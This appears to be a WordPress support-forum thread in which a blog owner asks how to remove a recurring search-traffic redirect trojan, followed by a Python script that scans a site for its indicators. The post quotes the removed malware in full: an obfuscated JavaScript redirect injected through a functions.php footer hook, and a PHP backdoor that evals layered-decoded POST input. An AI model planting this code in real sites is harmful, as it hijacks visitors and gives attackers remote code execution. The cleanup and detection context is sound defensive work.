Hi everyone,

    we recently discovered that our WP blog was infected. It is a redirecting trojan that redirects our traffic from search engines to a site (www.googosearch.biz).

    We first identified the redirecting code in the functions.php file, and deleted it. It looked like this:

    ?><?php
    add_action('get_footer', 'add_sscounter');
    	function add_sscounter(){
    		echo '<!--scounter-->';
    		if(function_exists('is_user_logged_in')){
    			if(time()%2 == 0 && !is_user_logged_in()){
    				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
    			}
    		}
    	}
    ?>

    But the thing is that it comes back every day! It looks like another file on our server is generating it every day.

    I found a suspicious file that was added by a Russian guy via FTP (I checked the logs) at the root of the site (but note that the site is healthy, only the blog is redirecting) named default.php. It looked like this:

    <?php if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST["e"]))))));exit;} ?>

    I deleted it, thinking this code was generating the redirecting code. But it didn’t do anything. The evil code is still showing up every morning in the functions.php file!

    Does someone have an idea of how this could be fixed?

    Thank you for your help,

    Alex
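Since the footer hook came back after default.php was deleted, the next step a defender would take is to sweep the whole install for every file carrying the indicators visible in this post: the get_footer/add_sscounter hook, the <!--scounter--> marker, the googosearch host and the eval/base64_decode/str_rot13/strrev backdoor chain. This is an added example, not code from the thread; the signature names, the scanned extensions and the sample strings are assumptions chosen here.

```python
import os
import re

# Indicators lifted from the code quoted in the post (names are constructed labels).
SIGNATURES = {
    "footer_hook":   re.compile(r"add_action\(\s*['\"]get_footer['\"]\s*,\s*['\"]add_sscounter['\"]"),
    "scounter_mark": re.compile(r"<!--scounter-->"),
    "redirect_host": re.compile(r"googosearch", re.IGNORECASE),
    "eval_chain":    re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*str_rot13\s*\(\s*strrev"),
    "post_backdoor": re.compile(r"\$_POST\s*\[\s*['\"]e['\"]\s*\]"),
}

def scan_text(text):
    """Return the sorted names of every signature found in one file's contents."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan_tree(root, exts=(".php", ".html", ".js", ".txt")):
    """Walk a WordPress tree and map each suspicious path to its matched signatures.

    Every file is scanned, not only functions.php: the re-infection source is
    whatever other file still carries the backdoor or a copy of the hook.
    """
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = scan_text(fh.read())
            except OSError:
                continue  # unreadable file: skip, do not abort the sweep
            if found:
                hits[path] = found
    return hits

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, found in sorted(scan_tree(root).items()):
        print(f"{path}: {', '.join(found)}")
```

Run it against the web root (not just wp-content) and also diff the result against a clean copy of the theme, since a hit in a file that should not exist at all is the more interesting finding.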

Viewing 6 replies - 1 through 6 (of 6 total)
The topic ‘Can't get rid of a redirecting trojan’ is closed to new replies.